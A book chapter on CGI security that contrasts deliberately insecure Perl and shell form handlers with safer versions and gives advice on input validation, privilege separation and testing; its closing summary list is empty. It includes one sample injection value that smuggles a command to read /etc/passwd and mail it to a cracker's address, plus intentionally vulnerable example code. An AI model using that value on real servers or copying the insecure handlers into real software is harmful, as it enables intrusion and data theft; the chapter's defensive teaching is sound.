Computers on a public network like the Internet can be vulnerable to misuse by malicious network users, or crackers. CGI is another Internet mechanism that can and must be deployed with security issues in mind.
At the time of the writing of this chapter, a significant proportion of the announcements on the Internet security mailing lists and bulletin boards describe CGI-related security problems. Subscribers could easily get the impression that CGI represents a security risk to any organization that employs it. Is this fear justified?
The Common Gateway Interface specification is not insecure per se. The specification defines a way for World Wide Web servers to interact with query engines and information gateways. It entails the use of environment variables and standard input and output streams, none of which are fundamentally vulnerable. It is not the interface that is insecure.
However, CGI represents a powerful feature of many Web browsers. This feature allows a Web server not only to provide information, but also to provide access to the computing power of the server. It is important to note that a Web server that supports CGI gateway engines also gives Web browser users a degree of control over what the Web server does.
Careful use of CGI can deliver interactive Web sites, user-friendly information retrieval, and access to information not designed for the World Wide Web. This is achieved by allowing the Web browser user to control the information delivery and by implementing automatic translation of data from one form to another.
Careless use of CGI can and will compromise the security of the information provider. A CGI application implemented without due regard to security issues will allow the Web browser user much more control over the Web server than the programmer intended. If an organization is complacent about the security of its World Wide Web server, it should expect abuse of its computing facilities, downtime due to malicious attacks, and loss of information integrity of confidentiality.
Security vulnerabilities result from programming or implementation that does not guard against accidental or deliberate misuse. An example of this is a typical CGI gateway for accepting data typed into a World Wide Web form and passing it on as an e-mail message, as shown in Listing 9.1.
Listing 9.1. An insecure HTML form handler.
#!/usr/local/bin/perl
# formmail.cgi
# Accepts form submission and resends as an e-mail message to "webweaver"
# Call library routine to translate and split form submission
# into perl variables $input{"field"}
require "cgi.pl";
# Launch e-mail application "/bin/mail" with Subject: header from the "formname" Âfield
open (MAIL, "|/bin/mail -s ' ".$input{"formname"}." ' webweaver");
# And send "formcontents" field as the body of the message
print MAIL $input{"formcontents"};
close(MAIL);
exit(0);
This CGI gateway program will do what the programmer intended for most form submissions. It sends the form contents to the e-mail address "webweaver" using the auxiliary program /bin/mail.
However, this apparently simple and benign gateway could be a security loophole because it does no checking on the user supplied form data before passing it to the mail program. Notice what happens to the user-submitted data. A library module, cgi.pl, unpacks the form submission, restoring any characters that have been rewritten for safety by the Web browser or Web server, and then uses that information in a command interpreter to launch another program, /bin/mail. The data from the form field "formname" is passed unchecked to a command interpreter as an argument to the /bin/mail command. Then the data from the form field "formcomments" is passed unchecked as input to the auxiliary mail program.
The security vulnerability arises because command interpreters and several other applications assign special meanings to certain characters in their input. If the Web form user maliciously or even innocently included such special characters in either form field, the form submission could have side effects that the programmer did not anticipate. A malicious Web user could include operating system commands in either form field, and by surrounding them with appropriate special characters, have them run on the Web server. These commands could damage data integrity or allow the Web user unauthorized access to data on the Web server. They might even be used to give the user full control of the Web server.
For example, the cracker might construct a form submission in which the "formname" field is set to
'`grep root /etc/passwd` cracker@illegal.org #'
This CGI gateway program is a security hole waiting to be hacked, simply because the programmer failed to check the user-supplied data before passing it on to other programs.
Other security vulnerabilities can arise from assuming that the "conversation" between the Web browser and the Web server is private. Inviting the user to enter secret passwords, credit card numbers, and other confidential information puts the confidentiality of that information at risk. The Internet is a public network. World Wide Web form submissions are usually unencrypted. It is possible that the information in the form submission could be captured and read somewhere between the browser and server.
The mechanisms that make up the Internet are themselves less secure than some Internet users realize. For instance, there is no easy way to prove that an Internet electronic mail message is genuine. Forging mail messages that appear to come from one person but actually come from someone else is trivial, especially now that more and more Internet users install and configure their own e-mail applications. Internet data streams purporting to come from one source can be spoofed or hijacked by skilled crackers. These are not insecurities in CGI but should be taken into account in any assessment of the security of CGI.
Some Web servers use proprietary interfaces as an alternative to CGI. While these may be claimed to be more secure than the CGI system, they often limit what the gateway programmer can do or allow just as much misuse.
Some Web browsers support secure network communications, interactive and programmable features such as built-in browser control scripting languages, or even full network application systems. These can be used to add a level of security to CGI, or even to achieve similar results but with browser-side processing instead of server-side handling. However, an information provider exploiting these features will bar access to the information for users with other browsers.
Despite the dangers described previously, if the Web information service implementors design their implementation to guard against potential misuse, a CGI gateway can be profitable and useful without introducing security vulnerabilities.
The implementors of a Web service are jointly responsible for CGI security, but the defensive weapons in their armory differ according to their role.
The system administrator of a Web server can do much to defend against CGI misuse, as detailed in the following sections.
The administrator should discuss with programmers all CGI-based implementations and security risks. Together they can share information on known security problems with server software and establish codes of practice that reduce the risk from attacks. They could also implement a process of peer review through which programmers review each other's code for possible security vulnerabilities.
Security concerns should influence the choice of Web server software. Both the HTTP server, and any other off-the-shelf server software such as CGI libraries and gateways should be selected with care. Read the release notes for the software and regularly check the Web "home page" for the server software for information about security problems and new versions. Where possible, use the most recent stable version of the software. Don't be tempted to implement "beta-release" software by the promise of new features. Security vulnerabilities are often found in "beta" software-vulnerabilities that are fixed in the production release. Subscribe to any Web-related mailing lists and security bulletin boards where server security problems are discussed.
If the intended audience for your Web site uses a specific set of machines, perhaps within one organization, it may be possible to restrict access to your Web server to allow connections from only those machines. This can be achieved through the scoping features of certain Web servers, using "access.conf" or ".htaccess" files, for example. The same or better protection can also be provided at the network level by using TCP/IP wrapper software or router access control lists.
On Web servers that do not make use of CGI gateways, the administrator should disable the CGI functionality altogether. If CGI gateways are needed, the administrator can often restrict the CGI functionality to a specific part of the Web site or deny CGI functionality to all but the trusted users. This may mean that CGI access is allowed from browsers within your organization to the CGI development area, but World Wide Web users on the Internet as a whole are allowed access only to tested and trusted CGI gateways.
Administrators should take the time to carefully read the source code and release notes for CGI gateways before they are installed. This advice applies not only to CGI programs developed in-house, but also to freely available CGI code. Security vulnerabilities are often discovered in public domain server software after it has been released. An administrator should also follow the Internet mailing lists and Usenet newsgroups that discuss the software concerned for news of possible security problems.
If the operating system or Web software on your server will allow, ensure that CGI programs are run in a protected environment. On multiuser operating systems, set up your server to run as a nonprivileged user, preferably a user specifically for that purpose. Under networked operating systems, there may already be a nonprivileged account known as "nobody," but where possible use a different account specifically for running CGI programs.
If possible, run the CGI program in a virtual emulated machine, or in a subsection of the server's file system so that it cannot see the rest of the server files.
Caution |
Do not run the Web server with super-user privileges. If a malicious intruder finds a security vulnerability in the Web server software, that intruder will immediately have full control of the server. Avoid CGI wrapper software that gives CGI programs the same privileges as the author of the CGI script. Such a wrapper merely lends extra power to the intruder who exploits any CGI security vulnerabilities. If a CGI gateway cannot access information as an untrusted user, this should prompt the implementor to reassess the availability of the information, not the privileges of the CGI gateway. |
Choose a machine to be the CGI server that does not hold any secure information and that is not generally trusted by other network hosts. This need not even be your main Web server; setting aside a machine exclusively as a CGI server simplifies the security problem. If your organization uses a firewall gateway or router, position your CGI server outside this firewall to limit the advantages of an intruder who succeeds in exploiting a CGI security hole. Do not host the CGI scripts on the firewall gateway itself, because a security infiltration could compromise the whole organization.
If possible, set the priority of CGI programs lower than other processes in a multiprocessing environment. This will limit the damage caused by malicious or accidental floods of CGI requests that might otherwise have disabled the CGI server.
Security vulnerabilities and improved versions of server software are often announced and discussed in the Internet discussion groups. Information from software suppliers and other users can be invaluable.
The author of a CGI gateway program can also do much to defend against security breaches, as outlined in the following sections.
The programmer should discuss with Web server system administrators all CGI-based implementations and security risks. Together they can establish codes of practice that reduce the risk from attacks. They could also implement a process of peer review through which programmers review each other's code for possible security vulnerabilities.
When choosing CGI toolkits and library software, examine and test them for possible security vulnerabilities. Read the release notes for the software and regularly check the Web "home page" for the library software for information about security problems and new versions. Where possible, use the most recent stable version of the software. Don't be tempted to implement "beta-release" software by the promise of new features. Security vulnerabilities are often found in "beta" software-vulnerabilities that are fixed in the production release. Subscribe to any Web-related related mailing lists and security bulletin boards where CGI security problems are discussed.
If the intended audience for your application uses a specific set of machines, perhaps within one organization, it may be possible to restrict access to your CGI gateway to allow connections from only those machines. This can be achieved either through the scoping features of certain Web servers, or by checking the REMOTE_HOST environment variable.
If you have a small number of known users for your application and the Web server you are working with has support for HTTP password authentication, you might choose to implement a username and password scheme to restrict access to the CGI gateway to the trusted set of users. This is not a substitute for careful coding, but it allows the programmer to put less emphasis on defending against malicious attacks or unauthorized use.
If you are writing software for any public network service, it is safest to believe that they are out to get you. Even if you consider the data you are handling to be public and your organization to be unattractive to crackers, remember that there are groups of people on the Internet who derive all their self-actualization from finding the security holes in your software, gaining unauthorized access to your computers and disrupting your network service, wasting the time and effort of you and your colleagues. Program defensively.
It is dangerous to make assumptions about the data that will be presented to a CGI program by the Web server.
Beware of assuming that the data is a submission from your form. Anyone can point a Web form at your CGI gateway, or generate an HTTP request that looks like a form submission but contains unsafe data.
The example of an attempt to use Listing 9.1 (formmail.cgi) to crack system security would probably be made from a raw, interactive HTTP connection opened by the cracker. It supplies an unexpected value to a form field that the form designer probably intended to be hidden from the Web user.
Beware of assuming that the data submitted is small enough to fit where you want it to fit. Whatever limitations you include in a Web form, a faulty Web browser or a wily cracker will easily get around them and attempt to crash or abuse your system by sending more data than you expected.
Beware of assuming that special characters in the data have been encapsulated by the browser using the %hh hexadecimal escape sequence. Browsers may not implement this convention, and crackers may easily circumvent it.
Many discussions of CGI security attempt to address the problem of characters in the query or submission that have special meanings.
Command interpreters and other simple interpreted languages are the most common victims. Characters like backquote ("`"), backslash ("\"), and dollar ("$") are interpreted as part of the interpreted language and can be exploited to trick the CGI gateway into running commands for a cracker on the Web server.
Other tools and even the operating system itself can be abused. Some useful applications will execute arbitrary commands if given the wrong input. ASCII control characters (those with decimal codes less than 32) can be used to disrupt text files where user supplied form or query data is logged.
Unfortunately, the most common defense is to try to compile a list of special characters and to guard against or exclude only those characters. This piecemeal approach is risky at best. The lists, like politician's speeches, are more interesting for what they omit than for what they include and are typically stripped from queries or form submissions as they have special meanings to command interpreters. Recently, several Web servers had to be rewritten to also defend against the inclusion of the "end-of-line" characters in search queries as these are considered special by many operating system operations.
A more satisfactory defense is to reduce the submitted input to a small set of acceptable characters. This set of characters will vary from application to application. For instance, a person's name could be restricted to upper- and lowercase letters (including the accented letters in the upper-half of the ISO-Latin-1 character set), spaces, hyphens, and apostrophes. With this analysis, the programmer will immediately discover that it is not possible to pass a person's name to a command interpreter wrapped in single quote characters because the single quote character (or apostrophe) can reasonably form part of someone's name.
The key technique is to choose a set of characters to accept, not to choose a set of characters to reject. The choice of acceptable input characters will be influenced by the intended use. If the input is to be passed as part of a command to the operating system command interpreter (as in Listing 9.1), programmers must find out whether any of the characters they would like their CGI program to accept have a special meaning to the operating system or to the other command.
Choose criteria by which you can validate the query or form submission. For instance, if the user has been asked to supply an Internet e-mail address, reject a submission that does not conform to the relevant Internet standards. You may even choose to validate the supplied e-mail address by sending a secret password to the address and insisting on the password for future submissions. Be prepared to have your program handle garbage input, empty input, random input, prank submissions, and malicious attacks.
Choose limitations on the size and structure of acceptable input. It is easy to assume that a prompt for a name will yield a response small enough to fit into the available memory of the Web server, but there is no reason why it should. A malicious attacker could send several megabytes of binary data where you expected a personal name. Careless handling of a "denial of service" attack like this could lead to Web server downtime or even software damage. If you requested a single line of text, reject submissions containing end-of-line characters. If a Web form includes selection lists or checkboxes, reject any data submitted that is not formed from the options presented to the user.
The data supplied by a user in a form submission or query should be treated as "contaminated" until it has been cleaned of potentially dangerous special characters.
The example program in Listing 9.1 passed data submitted from a form unchecked to the operating system command interpreter and to an e-mail application. A cracker suspecting this could have easily included quote characters in the form submission that could direct the command interpreter to run any command the cracker chose. The cracker might equally have chosen to exploit the e-mail application that might be similarly persuaded to run commands with the use of an escape character or exclamation mark.
The program might have been more safely written in the manner shown in Listing 9.2.
Listing 9.2. A more secure HTML form handler.
#!/usr/local/bin/perl
# formfile.cgi
# Accepts form submission and logs to a file for later use
# Call library routine to translate and split form submission
# into perl variables $input{"field"}
# the library routine limits the size and content of the input
# to a length and to characters considered safe
require "safecgi.pl";
# Open the log file for "append". Do not pass the form contents to any operating Âsystem routine
open (FILE, ">>/home/webweaver/form.log");
# Write some key headers for this message
print FILE "Script:".$ENV{"SCRIPT_NAME"}."\n";
print FILE "Host: ".$ENV{"REMOTE_HOST"}."(".$ENV{"REMOTE_ADDR"}.")\n";
print FILE "Date: ".`/bin/date`;
# And write the form data into the file
print FILE $input{"formcontents"}."\n";
close(FILE);
exit(0);
In the program in Listing 9.2, no user data is passed to be reinterpreted by an operating system command or any other program. It is simply written to a file for examination by a "safe" file browser later. The user data never contaminates any operating system command or operation.
CGI programming languages that permit the reinterpretation of variables as program code, such as scripting languages and command interpreters with an eval function, pose the extra problem of user data potentially contaminating the CGI program itself. Care should be taken to avoid passing unchecked user data to any interpreter, explicitly or implicitly.
Some programming languages include features to make the tracking of unchecked or "contaminated" data easier. For instance, the Perl scripting language supports "taint" checking, which helps to identify unchecked data before the program is used. Nevertheless, for most applications, the programmer should attempt to design a clear demarcation between unchecked and validated user data. This might be a variable naming scheme, perhaps where the unchecked data is kept in variables whose names begin with the word "raw" and are transferred upon validation and safety checking to variables beginning with the word "cooked." Alternatively, it might be a logical demarcation in the program's structure where the raw data is available only in the routines that accept the user input and is passed to the rest of the program after rigorous checking.
Many interpreted programming languages have inherent limitations in the size of some variable data types. It is also difficult to handle data of an arbitrary size in many compiled languages. For some tools and applications, the programmer will accept the risk of choosing a maximum reasonable size for user-supplied data and might not even check that the user-supplied data is small enough to fit in the storage space set aside for it.
When the application is being made available to anyone and everyone on the Internet, array bounds checking cannot be ignored. It is important that the CGI programmer chooses reasonable limits for the size of the expected input and checks that the programming system being used cannot accommodate those sizes. The programmer must then ensure that any user-supplied data larger than that limit is rejected or ignored. Dynamically allocating as much memory as the user data would fill runs the risk of exhausting the memory of the Web server to the detriment of the Web service. Allowing user-supplied data to over-run a fixed buffer size can cause operating system crashes or can even be exploited to gain unauthorized access to the Web server itself. Recently, crackers have successfully abused poor array bounds checking in Web server software to substitute their own executable program code for the server code in memory.
This is a particular problem if a cracker is able to trick the Web server into delivering the CGI program itself as a Web document rather than its results. The cracker can then "reverse-engineer" the program to determine its weaknesses. Web server software often announces the hardware and operating system platform on which it is running, and Web sites sometimes include this information in Web pages. If a cracker knows what platform the Web server is running under, the cracker can exploit these vulnerabilities more easily.
A CGI gateway is likely to be more secure if it behaves like a pure filter, that is if it does not do different things with different user-supplied data. If there is one normal execution path through the CGI code, it is much easier to track which user data has been validated and which is still "contaminated." The CGI program is simply a filter. If the program takes different execution paths depending on the data supplied, there are many more possibilities to test. In this latter case, the CGI program is behaving like an interpreter, and the canny cracker may be able to construct input that has side effects the programmer could not anticipate due to the complexity of the program.
The security vulnerabilities in the program in Listing 9.1 were mainly associated with passing the user supplied data to other programs. To launch the mail application, the CGI gateway implicitly used a command interpreter in the following statement:
open (MAIL, "|/bin/mail -s ' ".$input{"formname"}." ' webweaver");
Part of the form data is included in the command. A cracker could have included any data in the form, including the character sequences necessary to cause the command interpreter to run any command the cracker wishes. Then the rest of the form data is passed as input to the mail application. Also, no allowance is made for the possibility that some input to the mail application could cause arbitrary commands to be launched.
The simplest way to avoid this kind of security vulnerability is to never pass the user data to any other programs. The CGI program in Listing 9.2 demonstrates this approach. Rather than using the mail command, the form data is simply logged to a file. A CGI programmer who is accustomed to the toolkit approach of calling many other utilities as modules in a program must either design a simpler self-contained pure filter or learn what the various utilities do when given any arbitrary input.
If the CGI gateway simply must pass the user-supplied data onto some other program, the gateway should first rewrite the dangerous characters in the data to prevent any undesirable side-effects. The programmer must choose a set of characters or an input language that will always have the expected effect in the auxiliary program and then force the user-supplied data into this form. However, in doing so the programmer must not introduce any extra security problems by reinterpreting the user data in the current program. Command scripting languages pose a particular problem here, as it is difficult to refer to the raw CGI environment variables without reinterpreting them in the context of the scripting language. Listing 9.3 is an example IMAGE MAP script that demonstrates the problem.
Listing 9.3. An insecure IMG ISMAP handler.
#!/bin/sh
# Clicking on the map.gif image sends the pixel coordinates as x,y
# in the QUERY_STRING environment variable
# Check for valid coordinates
if echo $QUERY_STRING | egrep '^[0-9][0-9]*, [0-9][0-9]*$' >/dev/null
then
# Send a magnified portion of the image
echo "Content-type: image/gif"
echo ""
zoom $QUERY_STRING map.gif
else
# Send an error message
echo "Content-type: text/html"
echo ""
echo "Picture Zoom Error: Invalid pixel coordinates passed"
fi
Observe in Listing 9.3 that the user query in the QUERY_STRING environment variable is expanded as part of the command
echo $QUERY_STRING
and could have undesirable side-effects if it contained special characters.
A safer implementation would be the script in Listing 9.4:
Listing 9.4. A more secure IMG ISMAP handler.
#!/bin/sh
# Clicking on the map.gif image sends the pixel coordinates as x,y
# in the QUERY_STRING environment variable
# Check for valid coordinates
if /bin/env >/dev/null 2>&1 && /bin/env | /bin/egrep '^QUERY_STRING=[0-9][0-9]*, Â[0-9][0-9]*$' >/dev/null 2>&1
then
# Send a magnified portion of the image
/bin/echo "Content-type: image/gif"
/bin/echo ""
/usr/local/bin/zoom $QUERY_STRING map.gif
else
# Send an error message
/bin/echo "Content-type: text/html"
/bin/echo ""
/bin/echo "Picture Zoom Error: Invalid pixel coordinates passed"
fi
The program in Listing 9.4 does not use the environment variable in a command until it has been safely checked by parsing the output of a command /bin/env, which dumps the whole set of environment variables without reinterpreting them. The first invocation of /bin/env is to ensure that the command does not find any unexpected problems with the environment variables such as unsupported variable names. The second invocation passes the user supplied data to a format checker without passing it through the command interpreter. This technique is not completely safe. It assumes that the /bin/env command will terminate with an error if any environment variable contains an "end-of-line" character or some other control code. However, not all systems have this capability.
Writing code that checks for individual dangerous input characters on a case-by-case basis is difficult to maintain and test. Writing a general reusable validator is a good investment. Something like the C procedure in Listing 9.5 can be used again and again. It takes as its arguments two pointers to null-terminated character strings and returns the first pointer with its contents rewritten to remove any characters not in the second string.
Listing 9.5. Stripping unwanted characters in C.
#ifndef MAX_UchAR
# define MAX_UchAR (255)
#endif
typedef unsigned char uchar;
char *stripchrs(char *string, const char *chrs) {
char acceptable[MAX_UchAR], *chr, *pos;
int chrnum;
/* Build a 256 entry table of flags for whether a particular character */
/* is acceptable or not. */
for (chrnum=0; chrnum< MAX_UchAR; chrnum++) acceptable[chrnum]=0;
for (chr=chrs; chr && *chr; chr++) acceptable[(uchar)*chr]=1;
/* Step through the string copying only acceptable characters */
for (chr=string, pos=string; chr && *chr; chr++) {
*pos=*chr;
pos+=acceptable[(uchar)*chr];
}
*pos='\0';
return(string);
}
Even if you are aware of a potential security vulnerability in a program, do not annotate the program with a comment describing the security hole. Many Web servers can be fooled into delivering the CGI program itself as a Web document instead of running it. A comment in the code is a gift to the potential cracker.
When writing your CGI program, follow the paths that the user-supplied data takes through the program and check that no user-supplied data influences the running of the server until it has been rendered harmless.
When testing your CGI program, try to think of ways to break the program. Send it garbage input, input that contains special characters that attempt to execute commands on the server, input that is much longer than usual, empty input, and even random input. Check what happens if two instances of your CGI program run in parallel.
The main things to remember from this chapter are as follows:
And most importantly: